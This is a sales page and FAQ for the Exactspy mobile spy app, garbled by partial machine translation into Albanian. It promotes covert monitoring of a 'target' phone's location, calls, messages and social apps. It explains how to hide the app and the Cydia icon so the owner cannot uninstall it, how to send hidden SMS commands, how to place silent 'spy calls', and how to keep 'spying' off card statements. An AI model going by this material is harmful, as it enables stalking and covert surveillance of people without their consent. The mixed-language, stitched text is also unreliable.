Fakte -

Fakte

EXACTSPY- BEST MOBILE SPY APP FREE

GPS Tracking Vendndodhja

Ju mund të shihni vendndodhjen e pajisjes në hartë ose mund të merrni vendndodhjen e saj GPS menjëherë nga paneli kontrollit e anëtarit.

Call Log And Record

You can track all history of calls including time, kohëzgjatje, contact name… and record each call for you.

Track Messages

Trace messages of built-in application and trace iMessage (on iOS) even it was deleted by target users.

iphone Slider
  • App Slide 1
  • App Slide 1
  • App Slide 1
  • App Slide 1

View Multimedia

Enables you to see any data such as video recorded, photo… have been saved on the target phone.

Lajmëtarët e çastit

Ju mund të pista Apps rrjeteve sociale të tilla si Whatsapp, Viber, Yahoo Messenger, Facebook, Skype ...

Browser History

Track the history of websites visited from devices. Blloku atë që faqet e internetit që ju nuk doni përdoruesit të synuar për të vizituar.

1/ Cilat produkte Blackberry dhe modelet janë të mbështetur?

Exactspy does not support Blackberry smartphones yet..

2/ If there is a passcode on the device can you help me to by pass it?

Më vjen keq, ne nuk mund të ju ndihmojë me këtë problem, por ka disa mënyra për të anashkalojë kodkalim. Nëse pas instalimit të app, pajisja të kërkojë kodkalim ju mund të anashkalojë me parazgjedhur kodkalimin 1234. Or ask support team they will help you to bypass the passcode in Apple devices..

3/ How to download and use Exactspy on my phone?
Ju mund të ndiqni hap pas hapi udhëzim në dokumentet në këtë link: http://exactspy.com/download-center to download and install Exactspy into target device. Zgjidhni versionin e përshtatshëm për të sistemit operativ të telefonit tuaj të synuar. You can download the user guide document to learn how to use Exactspy on these link also..

4/ A mund të lexoj të dhënat kapur direkt nga pajisja me dorë, nga llogari të postës elektronike?,...
Po. For now you can view recorded data on your Exactspy online account at website or on your predefined email account (the data will send directly to your email account in stead of website..

5/ How does Exactspy work?

* Customer sign up an account on website www.exactspy.com > shkarkime software në telefon të synuar për të monitorohet > të instaluar software për të synuar telefonin > open Exactspy interface on target device and log in with Exactspy account created before. * Përdorues Telefon kryen mesazheve SMS, Shfletim URL dhe thirrjes aktivitete. Exactspy records the activities and then silently uploads logs to the Exactspy servers. * Customers go to website www.exactspy.com and log in into their online account with email and password used to sign up before from any Internet connected PC. Here they can view all recorded activities in near real time and configures program according to their monitoring needs..

6/ Se sa të dhëna mund të ruhen në telefon / në llogarinë e internetit?

Të gjitha të dhënat e regjistruara janë enscripted dhe të ruajtur në llogarinë tuaj online për 15 ditë, të gjitha të dhënat mbi 15 ditë do të fshihen automatikisht. Prandaj, mos harroni për të eksportuar të dhënat tuaja të raportit CSV dhe shkarkoni në kompjuterin tuaj për të mbështetur rregullisht. It is our policy because we do not want to keep your sensitive and important data..

7/ What languages can Exactspy Support?

Tani për tani, ne mbështesim afër 20 languages..

8/ A mund ta instaloni atë duke përdorur një SIM, por pastaj jepni telefonin për dikë që përdor një tjetër SIM? / A mund të ndryshoj SIM kartela?

Po, nga kursi. It will not effect Exactspy app operation..

9/ Cili është numri monitor?

Numri Monitor është numri që ju do të përdorni për të kontrolluar pajisjen synuar nëpërmjet komandave SMS dhe për të bërë përgjigje Auto (thirrje spiun). Numri Monitor nuk është synuar numrin e telefonit (number used in phone which Exactspy is installed)..

10/ Unë duhet futur numrin monitoruar në cilin format?

Shkruani numrin e telefonit që do të kontrollojë në telefon të synuar me komandat SMS (Shembull: nëse numri është +1-877-123-4567, hyj 18771234567)..

11/ Ndonjëherë unë nuk mund të shoh e të dhënave të reja GPS, SMS në llogarinë time në internet. Çfarë ka të ndodhë?

Ju duhet të kontrolloni përsëri nëse telefoni objektivi ka lidhje interneti. Exactspy use internet connection to send recorded data to server. If Exactspy can not send data to server due to no internet connection, ajo do të ruani të dhënat e regjistruara për fotografi të përkohshme në telefon të synuar dhe të presin për të dërguar ata përsëri kur lidhja e internetit është në dispozicion. Prandaj, në qoftë se telefoni juaj objektiv kanë lidhje interneti vetëm në disa periudha në ditë, sometimes you may feel new data updated slowly or lost..

12/ How to hide Exactspy icon in iDevice (iPhone, iPad, iPod Touch) trampolinë dhe Cydia?

If you want to hide the icon of Exactspy and Cydia application from springboard, trokitje e lehtë në ikonën e telefonit për të bërë një thirrje, kasetë fjalëkalimin e parazgjedhur #1234* ose #123456* dhe trokitni lehtë mbi butonin e gjelbër Call. Në rast se ju doni të ndryshoni kodin e parazgjedhur, you can adjust it on user control panel website my.exactspy.com. You can hide also the icon Cydia on springboard to don’t let the user uninstall the application Exactspy. After that you will see the icons of application Exactspy disappear from your springboard..

13/ How to activate Exactspy features without touching the target phone?
Ju mund ta bëni këtë nëpërmjet internetit http://my.exactspy.com or use SMS commands. Në faqen e internetit, login në llogarinë tuaj > info faqe e hapur Cell > adjust Exactspy parameters like you want > Ruaj. The new settings will be applied to Exactspy on target phone in the next sync. Me komandat SMS: ju keni nevojë për të vendosur një numër monitor parë, atëherë përdorni këtë numër të monitoruar për të dërguar SMS komandat për të synuar numrin e telefonit. Bazuar në nevojën tuaj, you can choose suitable command in List of SMS remote control commands part of user guide document…
14/ Çfarë është Sim njoftimi ndryshim?

With Exactspy version lower 1.2, this option is request target phone send an SMS to monitor number with information about target phone and Exactspy app settings used on target phone. Ju do të dini numrin e tanishëm të telefonit të përdorura në telefonin synuar gjithashtu. With Exactspy version 1.2 dhe më i lartë, this option is request Exactspy alert monitor via SMS message every time SIM card using on target phone be changed..

15/ How to upgrade Exactspy for iOS iDevice (iPhone, iPad, iPod Touch) për versionin më të ri me dorë?

Hap 1: Uninstall version të vjetër. Nëse ju zgjidhni hide Cydia para, dial çelës sekret (në qoftë se ju nuk e kanë ndryshuar atë para, çelësi sekret parazgjedhur do të ishte e #1234*) për të treguar icon Cydia përsëri. Në Cydia, trokitje e lehtë Menaxho > Packages tab Exactspy > Modifikoj > Uninstall. Ose ju mund të uninstall aplikimin nga distanca duke përdorur numrin monitoruar për të dërguar SMS komandën <*#93> për të synuar numrin e telefonit. Hap 2: Remove old source Exactspy in Cydia. Open Cydia > Menaxho > Burimet > Redaktoj> tab Exactspy > Fshij > Prisni për procesin përfundojë. Hap 3: Add new source and install Exactspy new version. Repeat all steps in User Guide document to add new source and install Exactspy new version: http://exactspy.com/download-center After you finish installing process, mos harroni të ristartoni synuar iDevice (iPhone, iPad, iPod Touch) then log in to your account on Exactspy interface..

16/ Çfarë do të tregojnë në deklaratën time të bonove pas kryerjes së pagesës?

It does not show any things related ‘spying’ or ‘Exactspy′. Teksti do të tregoi në deklaratat e kartës së kreditit varet se ku je, sepse pagesa do të paguhet direkt me shpërndarësit tanë / Rishites. Sigurisht unë nuk shkruaj këtu. ;).

17/ Unë bëra pagesën tashmë, por ditët e licencës nuk janë shtuar të licencës llogarisë time. Çfarë ka të ndodhë?

Ndonjëherë nevojat Paypal 1 në 4 orë për të verifikuar një transaksion para se të dërgonte informacion për ne. Pas marrjes së informacionit nga Paypal, ditë e licencës do të shtohet në licencën e llogarisë tuaj. Prandaj, kur kjo ndodh, procesi duke shtuar ditën e licencës për licencën e llogarisë tuaj mund të vonohet 1-4 orë. Nëse i plotësoni këtë rast, don’t hesitate to contact our support team for help..

18/ Unë nuk kam një kartë krediti. A mund të paguaj nga Bank Transfer?

Yes you can..

19/ Çfarë tjetër mund të bëj në llogarinë time të internetit?

Përveç shqyrtimit të të dhënave të regjistruara, you can adjust how Exactspy work from your Exactspy web account, shkarkoni dhe të mbështetur të dhënat e regjistruara me formatin CSV ....

20/ Kanë të dhëna të reja të dërgohet në server në qoftë se është e skaduar llogaria ime?

Mos. Nëse llogaria juaj është i skaduar, karakteristika të cilat duhet tarifë (SMS, Telefononi ...) do të ndalojë dërgimin e të dhënave në server, ndërsa karakteristika të lirë (GPS, Auto Përgjigje) still work normally..

21/ If I remove my Exactspy account by accident, ajo mund të restaurohen? Do të përbëjnë licenca të jetë e humbur? Të gjitha të dhënat e regjistruara në llogarinë time të humbur?

Pasi ju të zgjidhni për të hequr llogarinë tuaj, ajo do të çaktivizohet dhe do të fshihen nga database tonë të regjistrimit të përdoruesve në 90 ditë më vonë. Pra, nëse ju hiqni llogarinë tuaj nga aksident, ju lutem kontaktoni ekipin mbështetjen tonë sa më shpejt të jetë e mundur. We will help you to restored your account include license and data..

22/ Can I use Exactspy in 2 synuar telefon me 1 llogari?

Po. Now you can use Exactspy in 3 pajisje për çdo llogari. Nëse keni nevojë të përdorni më shumë se 3 pajisjet, please contact with our support team..

23/ Unë dua të transferimit pajisjen time për llogari të re. Do të regjistrohen të dhënat nga unë pajisje të humbur ose të transferohen në llogari të re me pajisjen time?

Mos. Të dhënat tuaja regjistruara nuk do të jetë e humbur. Të gjitha të dhënat e regjistruara do të transferohen në llogari të re me pajisjen tuaj. Për të transferuar pajisjen tuaj për llogari të re, just open Exactspy interface on target phone then log in with new account. Your device with all recorded data will be transfered to new account..

24/ How to purchase a Exactspy package?

Now we purchase Exactspy with 18 Metodat duke përfshirë PayPal, master card… You can login with your account at my.exactspy.com and go to License and click Renew button to purchase or extend your license; ose ju mund të blini direkt në http://exactspy.com/buynow/.

25/ Nuk ka të dhëna në SMS, Call… logs of my Exactspy online account. Çfarë është e gabuar?

Ju lutem kontrolloni për të siguruar telefonin synuar mund të lidheni në internet. Exactspy use internet connection to send recorded data to server, kështu që nëse doesnot telefon objektiv kanë lidhje interneti, there will be no data sent to your account..

26/ A mund telefoni objektivi dëgjoni mua kur unë bëj një telefonatë spiun?

Mos. Nëse shfrytëzuesi objektiv kontakt telefon objektiv (zhbllokuar ekran për të përdorur), the Auto Answer call will be stopped immediately..

27/ SMS janë fshirë kapur ende?

All SMS sent/received on target will be recorded even if target phone user try to delete it immediately after sending/receiving..

28/ Si mund të rishikojë SMS, Call Shkrime dhe Vendndodhja Ndjekja e informacionit?

Identifikohu për të llogarinë tuaj në http://my.exactspy.com/ to see all your captured information. Nga llogaria juaj ju mund të lexoni ngjarjet individuale (klikoni në çdo rast për të hapur atë), or you can download a spreadsheet with all events..

29/ A shfaqet komandat SMS në historinë SMS të telefonit të synuar?

Mos. Kur telefoni synuar të marrin SMS komandë, Exactspy will hide these SMS immediately..

30/ A ka telefon objektiv duhet të ketë lidhje të internetit 24/24?

Objektiv Telefoni nuk duhet të ketë lidhje të internetit 24/24. But at least it should have internet connection sometimes a day so Exactspy can send recorded data to server..

31/ Can I install Exactspy remotely?

No.You duhet të ketë pajisjen fizikisht në dorën tuaj për rreth 5 minuta. Instalimi është e thjeshtë. Ju thjesht të hapur një faqe interneti në celular dhe shkruani kodin për të shkarkuar. Instaluar fillon automatikisht dhe vendosjen opsionet është e thjeshtë. Ju gjithashtu mund të ndryshoni parametrat dhe kontrolluar disa aspekte të vetë pajisjen, me komandat e largëta të fshehta SMS, ose me Paneli Kontrollit të Antarit faqe interneti në http://my.exactspy.com . Shënim për iDevice (iPhone, iPad, iPod Touch): iDevice (iPhone, iPad, iPod Touch) instalon nuk janë shkarkuar në këtë mënyrë, por instaluar përmes ndërmarrjes Cydia për një iDevice tashmë jailbroken (iPhone, iPad, iPod Touch)..

32/ How can I tell if Exactspy is on my phone?

Exactspy is not a virus and must be deliberately installed onto the Target device directly, me një grup të veçantë të hapave dhe konfigurimin. Kjo nuk do të kryejë funksione të cilat nuk janë konfiguruar me ndërhyrjen e njeriut. Megjithatë, kjo nuk do të instaluar ndonjë menutë e programit të dukshme, dosjet ose ikona (iDevice (iPhone, iPad, iPod Touch) version mund të zgjidhni për Hide / Unhide ikonën për qasje). Pasi të instalohet, ajo mund të arrihen ose uninstalled vetëm me ndërhyrjen në mënyrë të barabartë të qëllimshme e njeriut. You should not let anyone that you do not trust access your device..

33/ How do I install Exactspy?

Ju mund të ndiqni hap pas hapi udhëzim në dokumentet në këtë link: http://exactspy.com/user/download.aspx to download and install Exactspy into target phone. Choose the suitable version for the operating system of your target phone..

34/ After I installed Exactspy, sa kohë mund të duhet të prisni për të shqyrtuar të dhënat e regjistruara?

Ju duhet të presë të paktën 15 minuta për të shqyrtuar parë e regjistruar të dhënat në gjendje objektiv telefon ka lidhje të internetit gjithmonë. Nëse telefoni objektiv vetëm kanë lidhje të internetit disa herë, you may have to wait longer..

35/ Can I remove Exactspy remotely?

Tani për tani, only Exactspy version for iOS iDevice (iPhone, iPad, iPod Touch) mbështet funksion të largët ninstalling. Për ta bërë këtë, ju keni nevojë për të vendosur një numër të monitoruar pastaj të përdorin atë numër të monitoruar për të dërguar SMS komandën <*#93> për të synuar numrin e telefonit (phone which Exactspy is installed). Numri Monitor nuk është synuar numrin e telefonit. Email and password are email and password of your Exactspy account..

36/ What phones does Exactspy work on?

Now Exactspy compatible with: iDevice (iPhone 2G/3G/3GS/4/4S/5/5S, iPad, iPod Touch) Android(1.5/ 1.6/ 2.0/ 2.1/ 2.2/ 2.3/ 3.X / 4.X / 5.X).

37/ Çfarë është Këshilla dhe truket & Përse është e nevojshme që?

The application Exactspy needs to run silently in the background. Është e nevojshme të jailbreak iDevice tuaj (iPhone, iPad, iPod Touch) kështu që ju mund të drejtuar zbatimin heshtur në sfond. Jailbreaking telefonin tuaj instaloni automatike Cydia. Nuk ka kosto për jailbreaking iDevice tuaj (iPhone, iPad, iPod Touch) dhe kjo është plotësisht e kthyeshme në qoftë nevoja do të lindin kurrë. Si të Jailbreak iDevice tuaj (iPhone, iPad, iPod Touch). Ju mund të vendosë për të cilën metodë ju doni të përdorni. Përsëri, Ne nuk ofrojnë mbështetje ose udhëzime se si të jailbreak iDevice tuaj (iPhone, iPad, iPod Touch). Faqet e internetit më të mira e referencës për jailbreaking një iDevice (iPhone, iPad, iPod Touch) janë www.jailbreakmatrix.com dhe www.redmondpie.com…

38/ Si të uninstall aplikimin nga telefoni synuar?

Ju mund të mësoni se si të uninstall e aplikimit në telefon të synuar me udhëzim vazhdim në dokumentet udhëzues User. Shkoni në këtë link http://exactspy.com/user/download.aspx > zgjidhni version të përshtatshëm për të sistemit operativ të telefonit tuaj të synuar > download user guide document and review for more detail..

39/ Çka nëse pajisja objektivi nuk ka lidhje interneti?

Në shumicën e rasteve ju do të duhet qasje në internet në pajisje të synuar për të shfrytëzuar të gjitha funksionet dhe për të mbajtur një orar të besueshëm raportimi, por në varësi të asaj që ju duhet software për të bërë dhe çfarë telefonin synuar modelin që keni, mund të ketë disa opsione të tjera. iDevice (iPhone, iPad, iPod Touch) përgjithësi do të parazgjedhur për një lidhje Wi-Fi në dispozicion sa herë që. Lidhje Wi-Fi do të duhet të sigurojë një lidhje TCP / IP në internet, dhe pastaj mund të përdoret për çdo gjë lidhja GPRS celular është përdorur normalisht për, por vetëm kur WiFi është në dispozicion. Windows Mobile mund të jetë konfiguruar për të përdorur WiFi kur në dispozicion, përmes menaxherit Connections (mbi WiFi pajisje të aftë). Kjo mund të punojnë në mënyra të ndryshme në mes të modeleve të ndryshme dhe ne nuk mund të sigurojë mbështetje për vendosjen e atë. Ju do të duhet të konsultohet ose manual e telefonit ose me shërbimin e konsumatorëve për të parë nëse kjo është e mundur me pajisjen tuaj. Ndryshe, në qoftë se objektivi juaj është një telefon GSM që merr një kartë SIM, ju mund të përdorni përherë një kartë SIM me qasje në internet (edhe një SIM lirë parapaguar) vetëm për të marrë software të instaluar dhe setup, dhe pastaj të bie në ujdi atë me vet kartën e synuar SIM më vonë. Të gjitha funksionet jo-Internet do të vazhdojë të jetë aktiv atëherë (SpyCall, etj), por pa internet nuk do të jetë në gjendje të raportojnë çdo të dhënë (SMS, Call Shkrime, Email, Vend) you may be capturing..

40/ Pse pajisja objektivi duhet Internet?

Ju duhet të shërbimit të internetit për të shkarkuar fillimisht software direkt në pajisjen përfitues. Copy9 gjithashtu përdor lidhje interneti për të dërguar të gjitha të dhënat e kapur te llogaria juaj e përfshirë web për shqyrtim. Kjo është e gjitha SMS, Call Shkrime, Foto, keylogger, Shënime, Mesazhet e rrjeteve sociale, or Location information you are tracking on the target device..

41/ Kanë të dhëna të regjistruara gjatë periudhës kur telefoni objektivi nuk ka lidhje të internetit është e humbur?
Mos. Kur telefoni objektiv doesnot kanë lidhje interneti, Exactspy still records data but can not send data to server. Exactspy will save all recorded data in temporary files on target phone and wait to try to send again when the target phone has internet connection. Prandaj, dhënat e regjistruara nuk do të jetë e humbur. But you have to wait until target phone has internet connection to review new data..
Mobile Spy App For Android and iPhone ExactSpy